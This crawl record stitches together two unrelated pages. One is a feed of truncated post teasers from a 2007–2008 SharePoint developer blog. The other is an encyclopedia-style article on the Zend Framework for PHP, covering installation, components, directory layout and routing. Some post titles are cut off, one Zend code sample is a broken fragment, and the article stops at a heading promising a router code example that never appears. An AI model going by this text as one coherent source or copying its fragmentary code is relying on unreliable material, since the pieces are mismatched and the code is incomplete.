Craen2008-12-15T08:08:00-08:00Today I got into some code reviewing of an Item Event Receiver using Enterprise Library for data access. The problem occurred when registering the Event Receiver for a SharePoint List using the object model (SPList.EventReceivers.Add) Exception has been thrown by the target of an invocation. Here... (More)<img src="" height="1" width="1" alt=""/> a new security group to an Audience Van de Craen2008-12-11T05:29:00-08:00I had a new Active Directory security group created a few days ago but it still wasn't showing up in the Audience management pages when I tried to create a rule User member of AD group. After double checking my group settings I couldn't find anything out of the ordinary and my MOSS 2007 server had ... (More)<img src="" height="1" width="1" alt=""/> permissions for 'Save list as template' Van de Craen2008-12-09T01:41:00-08:00Consider the following scenario: A MOSS 2007 Portal where everyone has read permissions but some 'content owners' have elevated permissions on libraries and lists and want to save a list as template (.stp). In this case they need to have elevated access to the List Template Catalog (http://... (More)<img src="" height="1" width="1" alt=""/> and jQuery coolness Van de Craen2008-11-27T16:00:00-08:00Yes I know, you already have it first hand from Jan's blog but still... How cool is that teaser ?<img src="" height="1" width="1" alt=""/>: Sharing data over applications ? Van de Craen2008-11-12T06:37:00-08:00Introduction... (More)<img src="" height="1" width="1" alt=""/> 2007 and ZIP indexing Van de Craen2008-11-10T14:32:00-08:00Introduction Here's a post about indexing ZIP archives in the same style as the one I did on PDF indexing. The search engine makes use of IFilters to be able to read the specific structure of a certain file type and retrieve information from it that it puts in an index. When you perform a search qu... (More)<img src="" height="1" width="1" alt=""/> Update, August Update, October Update, Service Pack 2 UpdatesExcel ServicesForms ServerSteven Van de Craen2008-10-30T06:43:00-07:00update (December Update): The December Update was released recently and is a real cumulative update which simplifies installation quite a bit. Read more about it here: SharePoint 2007- December Update It's hard to keep up with the updates for SharePoint these day... (More)<img src="" height="1" width="1" alt=""/> Server: userName() function and Forms Based Authentication ServerSharePointSteven Van de Craen2008-10-20T07:15:00-07:00So you have an InfoPath 2007 form that renders as a Web page and you use the userName() function to get the current user. This works fine when you're using Windows Authentication but stays empty when you're using Forms Based Authentication !! Also note that for Windows Authentication it doesn't ret... (More)<img src="" height="1" width="1" alt=""/> Server: XmlFormView and setting the InitialView on load ServerSharePointSteven Van de Craen2008-10-10T05:50:00-07:00I have been struggling with this for too long and the result is still not quite satisfying but it'll have to do for now. I have a Web Control that renders an InfoPath form using the Microsoft.Office.InfoPath.Server.Controls.XmlFormView control and want the form to open with a specific View rather t... (More)<img src="" height="1" width="1" alt=""/> decompressing data from a cabinet file Van de Craen2008-10-07T04:40:00-07:00Introduction A SharePoint 2007 site with configured lists, content types, web parts, data, etc is saved into a template (.STP) for future creation of sites. However you receive the error "Failure decompressing data from a cabinet file". In one of our customer cases the culprit here were t... (More)<img src="" height="1" width="1" alt=""/> without hardcoding the modifications Van de Craen2008-10-03T03:12:00-07:00Description Not sure if this has been done or not but it seems unlogical to have the web.config modifications hard coded into the Feature Receiver, so I whipped up a quick mechanism to read it from an external config XML file. Feel free to use and improve as desired. The code uses LINQ to XML for r... (More)<img src="" height="1" width="1" alt=""/> Automation: extract embedded Word Documents Van de Craen2008-09-18T07:09:00-07:00I'm normally not into Office Automation but today I needed to extract all embedded files from a Word Document. Those files were Word, Excel and PDF documents. Luckily the majority were Word documents, because the quick solution I whipped up only works for those types, not for Excel or PDF. Here's t... (More)<img src="" height="1" width="1" alt=""/> a list based on a multivalue column and filter Van de Craen2008-09-17T04:48:00-07:00Today I got into testing how to filter a list with a multivalued Choice (or Lookup) column based on a multivalued filter. The setup I'm using is to connect a Choice Filter Web Part with the List View Web Part. Once you have configured the Filter Web Part and connected it to the List View Web Part ... (More)<img src="" height="1" width="1" alt=""/> and restore Site Collections between localized SharePoint installations Van de Craen2008-08-21T04:15:00-07:00Question Pop quiz: I have a Dutch installation of SharePoint (WSS 3.0 or MOSS 2007) that already contains a lot of data. I want to restore the main site collection on a different server with English installation of SharePoint. Can it be done ? Considerations Take into account that a localized v... (More)<img src="" height="1" width="1" alt=""/>: TODAY + 1 hour formula ? Van de Craen2008-08-19T04:29:00-07:00I clicked together an easy custom announcements list with Begin and End Date and wanted for each new item the following default values: Begin Date = TODAY End Date = TODAY + 1 hour Setting the Begin Date is easy but I scratched my head a few times for the End Date. I found the following info... (More)<img src="" height="1" width="1" alt=""/> what's new ? Van de Craen2008-07-22T04:42:00-07:00I've been out of the game for somewhat a month now and it seems I've been missing quite a bit. I'm not going to make another annoucement about the Infrastructure Update (Oops... I think I just did) because it has already been widely blogged in the community. Can't wait to run it on some of ou... (More)<img src="" height="1" width="1" alt=""/> Action Button Field TypesSteven Van de Craen2008-06-20T10:24:00-07:00Introduction Don't you just miss the possibility to have buttons on a SharePoint List or Library View similar to an ASP.NET GridView ? You could add Edit or Delete functionality or even cooler things such as navigating to a LAYOUTS page rather than having to use the item context menu drop down:... (More)<img src="" height="1" width="1" alt=""/> Hyperlink fields in SharePoint 2007 Van de Craen2008-06-04T05:06:00-07:00Description Here's a small solution for those of you lucky enough to have MOSS 2007. It will not work if you only have WSS 3.0 installed. This project will add a browse button to all Link fields in your SharePoint Lists by using the AssetUrlSelector control. For more information about this see:... (More)<img src="" height="1" width="1" alt=""/> with the AssetUrlSelector Van de Craen2008-06-04T01:02:00-07:00I'm doing some tests with the AssetUrlSelector control to improve user experience in a SharePoint 2007 environment. The AssetUrlSelector control gives your end users a nice interface for selecting a link or image URL from a site collection. You can read the MSDN documentation here: AssetUrlSel... (More)<img src="" height="1" width="1" alt=""/> -o export: FatalError: Failed to compare two elements in the array Van de Craen2008-04-28T03:49:00-07:00Community Update It’s nice to see the community providing feedback on my tools and improving them. I strongly encourage this and here’s another example of this kind of interaction. Achim Ismaili has improved the FaultyFeatureTool and added it to codeplex:... (More)<img src="" height="1" width="1" alt=""/> and Equipment Reservations v2 (UNOFFICIAL) Van de Craen2008-04-21T06:25:00-07:00Introduction Microsoft released the Fabulous 40 Application Templates for SharePoint 2007 a (long) while ago. One of them is Rooms and Equipment Reservations (link) where you can make bookings for conference rooms, material, etc and get a visual overview of all bookings. Issues If you really star... (More)<img src="" height="1" width="1" alt=""/> a SharePoint MVP... Van de Craen2008-04-17T06:24:00-07:00This post says it all: Hope to be there next MVP Summit :)<img src="" height="1" width="1" alt=""/> MVP on the block Van de Craen2008-04-02T07:17:00-07:00Yesterday I got notice about being awarded MVP for SharePoint Server ! At first I figured it to be an April Fool's joke but no such thing :) I'm really loving this !!!<img src="" height="1" width="1" alt=""/> MySite Blogs Van de Craen2008-03-28T13:58:00-07:00Introduction I was recently tasked with writing a handler to display the combined RSS feed of all MySite blogs on a SharePoint Intranet. The handler takes into account the current user permissions (no rights to see the blog or post means you don't see it in the feed). Deployment Add the SharePoint... (More)<img src="" height="1" width="1" alt=""/> and asynchronous Event Handlers Van de Craen2008-03-21T02:16:00-07:00In SharePoint 2007 it is possible to handle events that occur on list items. These types of events come in two flavours: synchronous and asynchronous. Synchronous: happens 'before' the actual event, you have the HttpContext and you can show an error message in the browser and cancel the ev... (More)<img src="" height="1" width="1" alt=""/> 2.0 Final Release Van de Craen2008-03-14T02:14:00-07:00CKS:EBE 2.0 has been released since a few days ! Check it out here:<img src="" height="1" width="1" alt=""/> 2008 wrap up Van de Craen2008-03-13T13:45:00-07:00Today was the last days of TechDays 2008 and it was nice to see all those familiar faces again. The group of people you meet at such events just increases every year; I wonder how it would be like in 20 or 30 years from now... I didn't sit through many SharePoint sessions but decided to go broader ... (More)<img src="" height="1" width="1" alt=""/> Activation Dependency + Hidden = Automagic Van de Craen2008-02-23T10:56:00-08:00In SharePoint 2007 you can make features dependent on each other so that FeatureB can only be activated if FeatureA is. If this isn't the case it will prompt you with a message to activate FeatureA first: Now, when you mark FeatureA as HIDDEN the Feature Dependency will automagically active i... (More)<img src="" height="1" width="1" alt=""/> Errors: 6482, 7888, 6398 and 7076 Van de Craen2008-02-23T10:56:00-08:00Problem I was receiving multiple complaints from clients with the above errors in the machine's Event Log: Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt. Besides the errors it ... (More)<img src="" height="1" width="1" alt=""/> node in new Content Type XML Van de Craen2008-02-23T10:54:00-08:00If you declare your Site Columns and Content Types in XML to deploy them as a Site Collection feature, you must make sure to ALWAYS include the <FieldRefs> node. If you leave it out then your Content Type will not have any of the inherited fields of the parent Content Type !!! <ContentTyp... (More)<img src="" height="1" width="1" alt=""/> 2008 Van de Craen2008-01-30T03:00:00-08:00Thought I'd promote the upcoming TechDays 2008 event (previously the Developer & IT Pro Days) in Ghent. Three days packed with loads of presentations about upcoming technologies and releases. Find out about the program, speakers and more on the following site:... (More)<img src="" height="1" width="1" alt=""/>: Selected node CSS bug Van de Craen2008-01-24T02:14:00-08:00I may have found a bug in the SPTreeView control. When you select a node the CSS class declared in the SelectedNodeStyle isn't applied to the node. Other than that it seems to behave correctly. Sample markup (in a LAYOUTS page) <wssuc:InputFormControl in XP: Cannot add this hardware Van de Craen2008-01-19T02:05:00-08:00I had an issue for some time now where I could not add new USB Plug & Play devices (memory sticks, hard drives, camera's, etc). Devices that were added before the problem occurred still functioned properly, just the new ones wouldn't install. I tried: Changing stuff in the registry (values... (More)<img src="" height="1" width="1" alt=""/> start workflow Van de Craen2008-01-18T08:51:00-08:00Programmatically starting a workflow requires the following code: Guid wfBaseId = new Guid("{6BE0ED92-BB12-4F8F-9687-E12DC927E4AD}"); SPSite site = ...; SPWeb web = site.OpenWeb(); SPList list = web.Lists["listname"]; SPListItem item = list.Items[0]; SPWorkflowAs... (More)<img src="" height="1" width="1" alt=""/> Indicator not working on client Van de Craen2008-01-17T03:58:00-08:00If the Online Presence Indicator is not working properly on some clients it could be that the IE plugin is corrupted. Client has Office 2003 Try reinstalling the Office Web Components. Client has Office 2007 Try the following: Close all IE windows Rename the file C:\Program Files\Microso... (More)<img src="" height="1" width="1" alt=""/>: FullTextQuery RowLimit Van de Craen2008-01-14T02:05:00-08:00When you query the SharePoint Search Service the number of rows returned defaults to 100 but can be increased as required. Note that when you specify a value above the maximum RowLimit the query will only return the default value of 100 items ! ServerContext ctx = ServerContext.Defaul... (More)<img src="" height="1" width="1" alt=""/> updated with CKS:EBE Van de Craen2007-12-27T12:42:00-08:00 late... (More)<img src="" height="1" width="1" alt=""/>: Text Property Builder in a custom ToolPane/EditorPart Van de Craen2007-12-27T06:49:00-08:00Introduction By default text properties in the Web Part Property pane can be filled in using a Property Builder as shown below: This only applies to the default SharePoint ToolPanes (or EditorParts as they're called in the new terminology). If you develop a custom ToolPane or EditorPart with ... (More)<img src="" height="1" width="1" alt=""/> Services Trusted Locations and Alternate Access Mappings ServicesSteven Van de Craen2007-12-20T04:10:00-08:00Yesterday I discovered that Excel Services' Trusted Locations don't use the Alternate Access Mappings collection from MOSS 2007 to grant or deny access to a workbook inside a SharePoint Document Library. I did a search on the Web and apparently it is already a known issue: Excel Services will ... (More)<img src="" height="1" width="1" alt=""/> a SharePoint Workflow Van de Craen2007-12-20T03:35:00-08:00Terminating the workflow will set its status to Canceled and will delete all tasks created by the workflow. Via browser interface Via code // Cancel SPWorkflowManager.CancelWorkflow(workflowProperties.Workflow); Applies To Windows SharePoint Services 3.0 (+ Service Pack 1) Microsoft Office Share... (More)<img src="" height="1" width="1" alt=""/> Framework 2.0 and 3.0 Service Pack 1 Van de Craen2007-12-15T07:23:00-08:00I just noticed that Service Pack 1 for .NET Framework 2.0 and 3.0 has been released. I missed it completely due to the large number of announcements regarding Office 2007 Service Pack 1. .NET FX 2.0 SP1 redist x86 .NET FX 2.0 SP1 redist x64 .NET FX 3.0 SP1 redist x86 .NET FX 3.0 SP1 redist x64 Th... (More)<img src="" height="1" width="1" alt=""/> Part Gallery: Change Web Part metadata tool Van de Craen2007-12-10T06:27:00-08:00Using the Web Part Gallery you can easily add new Web Parts to a Site Collection and it will even generate the .webpart or .dwp XML file for you. Just drop the assembly in the BIN or GAC, add a correct <SafeControl> node in the web.config and you should see your Web Part(s) in the New dialog ... (More)<img src="" height="1" width="1" alt=""/>: Some things worth mentioning Van de Craen2007-12-06T09:09:00-08:00There are some things you need to know as a SharePoint developer... Creating a list When you create a list using the browser you get to specify the name for the list. Basically this means both the url part as the title. Not all characters are allowed in a URL so SharePoint will just filter them ou... (More)<img src="" height="1" width="1" alt=""/> Columns in CAML: No option to modify values ? Van de Craen2007-12-06T06:41:00-08:00One of our projects is being automated using solution files and Features. When the Site Collection Feature is activated it automatically creates Site Columns, Site Content Types and a Document Library using both of the aforementioned. Currently the entire process is via Object Model code. However, ... (More)<img src="" height="1" width="1" alt=""/> Part Properties and the Event Life Cycle Van de Craen2007-11-30T04:12:00-08:00Something I noticed during Web Part development was that the Web Part Properties were not loaded at constructor call time. Makes sense since the control has to be instanciated before the properties can be loaded but I recently forgot and it had me troubled for a while. Q. So when are the Web Part P... (More)<img src="" height="1" width="1" alt=""/> Server 2008: installation gimmick Van de Craen2007-11-30T03:15:00-08:00I just installed the Release Candidate of Microsoft Search Server 2008 Express edition. Although the documentation mentioned a Basic and Advanced installation I didn't get that option. Another thing I noticed: SharePoint is everywhere :)<img src="" height="1" width="1" alt=""/>: Immediate alert notifications stopped working Van de Craen2007-11-23T02:09:00-08:00One of our MOSS servers was not sending out any alert notifications anymore. I'm not sure when it stopped working but recently users started complaining about it. When I subscribe to a new alert I still get the 'New alert' notification, but that's actually a different mechanism than the actual aler... (More)<img src="" height="1" width="1" alt=""/> Search: Basic Authentication issues Van de Craen2007-11-22T09:15:00-08:00One of our MOSS 2007 servers has a single Web Application (no extended Web Apps) and is configured to use Basic Authentication. I have confirmed that my dedicated crawl account has sufficient permissions in the Policy for Web Application section of Central Administration > Application management... (More)<img src="" height="1" width="1" alt=""/> Exception: Maximum retry on the connection exceeded NAVSOAPSteven Van de Craen2007-11-22T02:12:00-08:00Setup. C/AL // Create SOAP mes... (More)<img src="" height="1" width="1" alt=""/> 2007 and PDF indexing Van de Craen2007-11-21T07:16:00-08:00Introduction By default the SharePoint 2007 Search indexed only the meta data of a PDF document. By installing and configuring a PDF IFilter the Search will also index the contents of the PDF document. This allows users to find documents based on text inside the document. This process is called ful... (More)<img src="" height="1" width="1" alt=""/> Ed 2007: Day 5 Van de Craen2007-11-12T02:27:00-08:00Time sure flies when you're having fun. It has been an exciting week with a lot of interesting sessions which I have blogged about the last couple of days. Following now will be a variety of workshops for my colleagues at home about the new things we picked up here. The flight back was at 5:30 ... (More)<img src="" height="1" width="1" alt=""/> Ed 2007: Day 4 Van de Craen2007-11-08T14:38:00-08:00My head feels as if had single-handedly emptied the Sal Cafe's wine cellar... But other than the after effects I'm currently experiencing I had a great time at the Tech Ed Country Drink for Belgians and Luxemburgers. Workflow in Microsoft SharePoint Products and Technologies 2007 This session on ... (More)<img src="" height="1" width="1" alt=""/> Ed 2007: Day 3 Van de Craen2007-11-07T10:18:00-08:00Develop a Community Solution with VSTO 3.0, Office Open XML and WSS 3.0 Mario Szpuszta builds a restaurant rating web solution from scratch. Restaurant owners can submit their restaurant details in the form of a Word 2007 document containing Content Controls mapped to a custom XML part. A custom ... (More)<img src="" height="1" width="1" alt=""/> 2007: Exception when handling a document renaming event Van de Craen2007-11-07T06:07:00-08:00Situation I have written a small Event Handler to automatically copy the file name and version to custom text fields in order to be able to use them in Microsoft Word. ItemAdded ItemCheckedOut ItemUpdated Here's a small sample of the code I'm using: public override void ItemUpdated(SPItemE... (More)<img src="" height="1" width="1" alt=""/> Ed 2007: Day 2 Van de Craen2007-11-06T15:50:00-08:00I didn't get a lot of sleep last night because here in Spain they tend to have dinner really late in the evening. .NET Developers Advanced Introduction to SharePoint 2007 Ted Pattison delivered an excellent session for .NET developers explaining in detail some of the aspects and pitfalls... (More)<img src="" height="1" width="1" alt=""/> Ed 2007: Day 1 Van de Craen2007-11-06T15:49:00-08:00The first day of Tech Ed 2007 started very early for my flight from Brussels to Barcelona followed by a brief check-in at the hotel. This was my first year of Tech Ed and it was amazing to see how massive this event really is. Keynote S. Somasegar provided the keynote with some interesting upcomin... (More)<img src="" height="1" width="1" alt=""/> Kit For SharePoint: Beta 2 Van de Craen2007-10-16T07:18:00-07:00If you're wondering why my RSS feed was acting funny today; my blog was updated to CKS:EBE 2.0 Beta 2. There were no issues installing this release but I still needed to update my theme files (master page, XSL) because of all the new stuff in Beta 2. I immediately fixed some minor bugs where ... (More)<img src="" height="1" width="1" alt=""/> by FeedBurner Van de Craen2007-10-12T05:00:00-07:00From now on I'm syndicated by FeedBurner:<img src="" height="1" width="1" alt=""/> Forms Services problem with anonymous submitted forms using administrator-approved form templates Van de Craen2007-10-12T04:32:00-07:00Introduction We have designed an InfoPath 2007 Form that can be filled in from the browser using InfoPath Forms Services (using MOSS 2007). The MOSS 2007 Enterprise environment has an NTLM authenticated Web Application () and an anonymous extended Web Application (... (More)<img src="" height="1" width="1" alt=""/> Explorer crash when opening a MS Office document on SharePoint Van de Craen2007-10-12T02:53:00-07:00Issue You click on a Microsoft Office document inside a SharePoint Document Library and the browser crashes. Event Type: ErrorEvent Source: Application ErrorEvent Category: NoneEvent ID: 1000Date: 10/08/2007Time: 14:47:01 AMUser: N/AComputer: PC001Descr... (More)<img src="" height="1" width="1" alt=""/> Method Van de Craen2007-09-24T05:48:00-07:00A post about the ReplaceLink method of a Microsoft.SharePoint.SPListItem object. This method replaces all instances of a given absolute URL with a new absolute URL inside a SharePoint List Item. Remarks Only applies to URLs formatted as hyperlink (Rich Text Field) or inside Hyperlin... (More)<img src="" height="1" width="1" alt=""/>: 25 September 2007 Van de Craen2007-09-12T05:04:00-07:00 18:00 – 18:30 Registration and Welcome 18:30 – 20:15 Session 1: Guidelines and Best Practices for a Successful SharePoint Deployment within Your Organization Join this session if you are looking for answers to questions like ‘When is it appropr... (More)<img src="" height="1" width="1" alt=""/> Kit for SharePoint Van de Craen2007-09-10T04:27:00-07:00In case you were wondering what I've been up to lately: I have joined the Community Kit for SharePoint team to work on the Enhanced Blog Edition (EBE). This amazing project really extends some of the basic SharePoint 2007 functionality such as Intranet/Extranet deployments, blogging, wik... (More)<img src="" height="1" width="1" alt=""/> 2007: People Search Options shown by default (repost) Van de Craen2007-08-28T02:03:00-07:00Instructions Go to the People Search Page in your SharePoint Portal and modify the page (eg. /SearchCenter/Pages/people.aspx) Add a Content Editor Web Part right below the People Search Box Web Part Add the following javascript to the CEWP: <script type="text/javascript">var a... (More)<img src="" height="1" width="1" alt=""/> 1.1 CTP released Van de Craen2007-08-21T07:05:00-07:00Via Microsoft SharePoint Products and Technologies Team Blog: What's New in VSeWSS 1.1? WSP View, aka "Solution Package editing" New Item Templates: "List Instance" project item "List Event Handler" project item "_layout file" project item Fas... (More)<img src="" height="1" width="1" alt=""/>, Antivirus and Alert Notification Van de Craen2007-08-21T01:24:00-07:00Problem You receive a notification about an alert being created for a SharePoint List but receive no actual alerts after that. Cause Alerts not being received can be caused by so many things but one of the possible causes is your antivirus software on the SharePoint Server. Our antivirus softw... (More)<img src="" height="1" width="1" alt=""/> Server 2005: Importing from Excel error (repost) Van de Craen2007-08-14T02:55:00-07:00Something weird that occured today: I had an Excel file that I needed to import into my SQL Server 2005 database. I followed the instructions but kept getting an error. Problem Error 0xc020901c: Data Flow Task: There was an error with output column "Agenda 2" (63) on output &... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-08-13T01:46:00-07:00Description By default when you upload multiple files they are stored as the default 'Document' Content Type. Since I had a lot of templates to upload (over and over again) I created this tool to ease the pain. It's a Windows application that can upload multiple files directly as a specified Conte... (More)<img src="" height="1" width="1" alt=""/> and Site Templates (repost) Van de Craen2007-07-24T04:52:00-07:00By default your SharePoint pages are ghosted, which means the layout template is stored on the web front end server's file system, while the content is stored in SQL Server. Once you make modifications to a page using SharePoint Designer 2007, the page becomes unghosted; both layout and content ar... (More)<img src="" height="1" width="1" alt=""/> to connect publishing custom string handler for output caching (repost) Van de Craen2007-07-24T04:46:00-07:00Issue This had me troubling for quite a while and looking on the Internet didn't really give any real solutions (here and here). In my case the errors were caused by a custom Web Service that I added to SharePoint. When one of the Web Parts called the Web Service an event log entry was written:... (More)<img src="" height="1" width="1" alt=""/> characters in Site URL (repost) Van de Craen2007-07-24T04:43:00-07:00General When creating sites through the SharePoint Object Model, the Web Services or the Web Interface you need to filter the illegal characters when specifying the Site Name (which is the part of the URL that references your site). Here's a list of common illegal characters: # % & * {... (More)<img src="" height="1" width="1" alt=""/> WebPart Life Cycle reminder (repost) Van de Craen2007-07-24T04:38:00-07:00I'm currently programming some connectable Web Parts for MOSS 2007 and want to make this a small note to self: Web Part Life Cycle on page load OnInit OnLoad Connection Consuming CreateChildControls OnPreRender Render (RenderContents, etc) Web Part Life Cycle on button click OnInit CreateChi... (More)<img src="" height="1" width="1" alt=""/> 2007 Content Control mapping tool (repost) Van de Craen2007-07-24T04:36:00-07:00Here's a really handy tool for mapping your custom XML to Content Controls inside the Word document.<img src="" height="1" width="1" alt=""/> 2007 and SQL Server collation: Latin1_General_CI_AS_KS_WS (repost) Van de Craen2007-07-24T04:25:00-07:00Make sure the SQL Server collation for your SharePoint 2007 databases is set to Latin1_General_CI_AS_KS_WS. Case insensitive Accent sensitive Kana sensitive Width sensitive This was implemented because this collation most resembles NTFS file name restrictions.<img src="" height="1" width="1" alt=""/> Belux article: Customizing the Content Query Web Part (repost) Van de Craen2007-07-24T04:16:00-07:00My first article on MSDN Belux: It was written for MOSS 2007 Beta 2 but still very much applies to MOSS 2007 RTM.<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-24T04:08:00-07:00Description A SharePoint Library event handler to automatically link a picture to a MOSS 2007 User Profile. The file names must be of the following format: [accountName].[ext] ItemAdded The event handler extracts the account name from the new file The Profile Picture URL property of the c... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-24T03:40:00-07:00Description A tool for registering/unregistering Event Handlers from a SharePoint List or Library. It uses an XML file to register event handlers. <definitions> <definition assembly="ProfilePictureEventHandler, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4... (More)<img src="" height="1" width="1" alt=""/> create site using custom site definition error Van de Craen2007-07-23T05:28:00-07:00A while ago I blogged about creating a custom site definition for WSS 3.0/MOSS 2007. The problem I experienced today was with a WSS 3.0 installation and creating sites programmatically. Say I have copied the STS Site Definition and made some changes so only the 'blank' template remains. I ad... (More)<img src="" height="1" width="1" alt=""/> Studio 2005 Extensions for Windows SharePoint Services 3.0 Van de Craen2007-07-23T05:27:00-07:00They have been available for quite a while now: I have just started experimenting with them and they do have some specific oddities: "Object reference not set to... (More)<img src="" height="1" width="1" alt=""/> Query and "Attempted to perform an unauthorized operation" Van de Craen2007-07-23T05:26:00-07:00When I was trying some of the SharePoint 2007 (both MOSS 2007 and WSS 3.0) Search Query tools available... MOSS Query Tool Search Query Web Service Test Tool ... I kept getting the following error: System.Web.Services.Protocols.SoapException: Server was unable to process request. --... (More)<img src="" height="1" width="1" alt=""/> and try/catch Van de Craen2007-07-23T05:24:00-07:00When doing some SharePoint manipulations using the Object Model you will likely have an instance of a SPWeb object. When you try to update an item or list located in the SPWeb instance or update the instance itself you will most likely set the AllowUnsafeUpdates property to true before calling the ... (More)<img src="" height="1" width="1" alt=""/> 2007: Login failed for user 'DOMAIN\user' periodically (per minute) Van de Craen2007-07-23T04:36:00-07:00Issue One of our SharePoint installations suffered a crash, so we recreated the farm and restored a content backup. The search indexes and user profiles were rebuilt/imported. Since the crash we noticed a lot of 'Login failed' messages in the SQL Server machine's event log. These events o... (More)<img src="" height="1" width="1" alt=""/> 3.0 Event Handler: pre-event cancelling issues Van de Craen2007-07-20T08:37:00-07:00I'm currently implementing an Event Handler for a Picture Library - a project I will blog about in the near future - and have learned the hard way about handling event handlers... The issue I am experiencing applies to WSS 3.0 (and MOSS 2007) and seems to be about the pre-event event types. Th... (More)<img src="" height="1" width="1" alt=""/> 2003 Web Parts and Office 2007 clients Van de Craen2007-07-20T02:13:00-07:00The Office 2003 Web Parts can still be installed on WSS 3.0 and MOSS 2007. STSADM.EXE -o addwppack -filename "Microsoft.Office.DataParts.cab" -globalinstall For your clients to see the Web Parts correctly rendered they will need the Office 2003 client libraries and Internet E... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-18T08:50:00-07:00Description A default List View Web Part allows most types of columns to be filtered by a user. Unfortunately it is not possible to filter on eg. the name of a file in a document library. The FilteredViewWebPart allows to dynamically specify an additional filter before retrieving ite... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-18T08:45:00-07:00Description A default Content Query Web Part has an item limit that just retrieves the first X items. For displaying it allows to group these items based on a property (Created Date, Author, Site, ...). The GroupByItemLimitWebPart allows to specify an item limit per group (when grouping is enabled... (More)<img src="" height="1" width="1" alt=""/> | http://feeds.feedburner.com/vandest | CC-MAIN-2018-30 | en | refinedweb |
Zend Framework (ZF) is an open source, object-oriented web application framework implemented in PHP 7 and licensed under the New BSD License.[3] The framework is basically a collection of professional PHP[4] based packages.[5] The framework uses various packages by the use of Composer as part of its package dependency managers; some of them are PHP unit for testing all packages, Travis CI[6] for continuous Integration Services. Zend Framework provides to users a support of the Model View Controller (MVC)[7] in combination with Front Controller solution.[8] MVC implementation in Zend Framework has five main areas. The router[9] and dispatcher functions to decided which controller to run based on data from URL, and controller functions in combination with the model and view to develop and create the final web page.[5].[10] ZF2 and later is CLA free.[11] There is also a longterm support available for the framework (long term support or LTS) for a total duration of 3 years. In order to do this one need to modify the Composer requirement for Zend Framework.[12]
$ composer require "zendframework/zendframework:~2.4.0"
This will result in modification of composer.json file and will pin the semantic version 2.4.0 which will ensure you get updates specifically from 2.4 series. If user want to use a different LTS then they need to specify X.Y.) version.
Starting with Zend Framework version 2.5, components are split into independently versioned packages and zendframework/zendframework is converted into a Composer meta-package. Framework components introduced after the split are not added to the meta-package.
While zendframework/zendframework meta-package release version remains at 3.0.0, it will instruct Composer to install latest compatible versions of the framework components, as per the semantic versioning. Such that zend-mvc component will be installed at its current version 3.1.1, zend-servicemanager at version 3.3.0 and zend-form at version 2.10.2.
Zend Framework includes following components[13]:
Officially supported install method is via Composer package manager.
Zend Framework provides meta-package that includes 61 component but recommended way is to install required framework components individually. Composer will resolve and install all additional dependencies.
For instance, if you need MVC package, you can install with the following command:
$ composer require zendframework/zend-mvc
Full list of components is available in Zend Framework documentation[13].
Zend Framework follows configuration-over-convention approach and does not impose any particular application structure. Skeleton applications for zend-mvc and zend-expressive are available and provide everything necessary to run applications and to serve as a good starting point.
ZendSkeletonApplication, skeleton application using Zend Framework MVC layer and module systems, can be installed with:
$ composer create-project zendframework/skeleton-application <project-path>
It will create file structure similar to this:
<project name>/ +-- config/ | +-- autoload/ | | +-- global.php | | +-- local.php.dist | +-- application.config.php | +-- modules.config.php +-- data/ | +-- cache/ +-- module/ +-- public/ | +-- index.php +-- vendor/ +-- composer.json +-- composer.lock +-- phpunit.xml.dist
The config/ directory has application wide configurations. module/ directory contains local modules that are committed along with application. vendor/ contains vendor code and other modules managed independently from the application, content of the folder is normally managed by Composer.
Zend Framework module have only one requirement: Module class exists in a module namespace and is autoloadable. Module class provides configuration and initialization logic to application. Recommended module structure is as follows:
<modulename> +-- config/ | +-- module.config.php +-- src/ | +-- Module.php +-- test/ +-- view/ +-- composer.json +-- phpunit.xml.dist
The config/ directory holds module configs, src/ directory contains module source code, as defined in PSR-4 autoloading standard, test/ directory contains unit tests for the module and view/ directory holds view scripts.
Zend framework supports command line input to create structure of directories. We will use command line interface to start creating the directory structure for our project. This will give you complete structural understanding of directories. The interface supports and provides Zend_Tool interface giving a whole host of command functionalities.
This procedure will create Zend Framework project in a your own specified location. After running Zend_Toll it will create the basic application skeleton.[14] This will not only create directory structure but also all the basic elements of the MVC framework.[14] In order to get Apache functionalities the virtual host settings will be as:[14]
Listen 8080 <VirtualHost *: 8080> DocumentRoot /User/keithpope/Sites/hellozend/public </VirtualHost>
The basic directory structure created will be somewhat as mentioned in the aforementioned directory structure of Zend Framework with similar explanation. There is another aspect of Zend-Tool which is automatically initialized during installation is bootstrapping. Here the basic purpose is to initialize the request of page by developer. The main entry here created by Zend Framework is the Index file. Index file provides function to handle user request. This is the main entry point for all requests. Following shows the functionalities.[14]
In general Zend-Tool creates many important directory structures. This system is built upon Rapid Application Development technology. As a general rule of support the framework focuses on coding and project structures instead of focusing on smaller parts.[15]
Controller is the main entry to Zend Framework application.[16] The front controller handler is main hub for accepting requests and running the accurate actions as requested by the commands. The whole process of requesting and reacting is routing and dispatching (which basically means calling correct methods in a class) which determines the functionality of the code.[16] This is implemented by Zend_Controller_Router_- Interface.[16] The router functionality is to find which actions need to be run and on contrary dispatcher runs those requested actions.[16] The controller in Zend Framework is connected in a diverse array of structural directories, which provides a support to efficient routing.[16] The main entry point and the command controller is the Zend_Controller_Front, this works as a foundation which delegates the work received and sent. The request is shaped and encapsulated with an instance of Zend Controller Request HTTP, as a provider of access to HTTP requests.[16] The HTTP hold all the superglobals of the framework ($_GET, $_POST, $_COOKIE, $_SERVER, and $_ENV) with their relevant paths. Moreover, the controller also provides getParam functions which enables collection of requested variables.
Actions are important functionalities. Controllers do not function without Actions. For this purpose we create another method which has action appended in its name and automatically the front controller will recognize it as an action.[14] The Action has init method which shows its private nature and not accessible by anyone.[14] Following commands are run so that Zend_Tool can create action for us.[14] Through the use of standard dispatcher all functions are named after the action's name and followed by word "Action" appended.[16] This leads to controller action class containing methods like indexAction, viewAction, editAction, and deleteAction.
Windows users:
bin\zf.bat create actions about index
bin/zf.sh create action about index
An example of forms and actions:[17]', ), )); }//source: Zend Framework Guide }
Standard router is an important Front Controller tool. Here the main decisions are made in order what module, controller and action are being requested.[14] These are all processed here. The following are defaults structure.
The request follows a pattern first information is taken from URL endpoint of HTTP. URI is the end point of the request. URL structure follows as:[14]
The default router code example:[18]
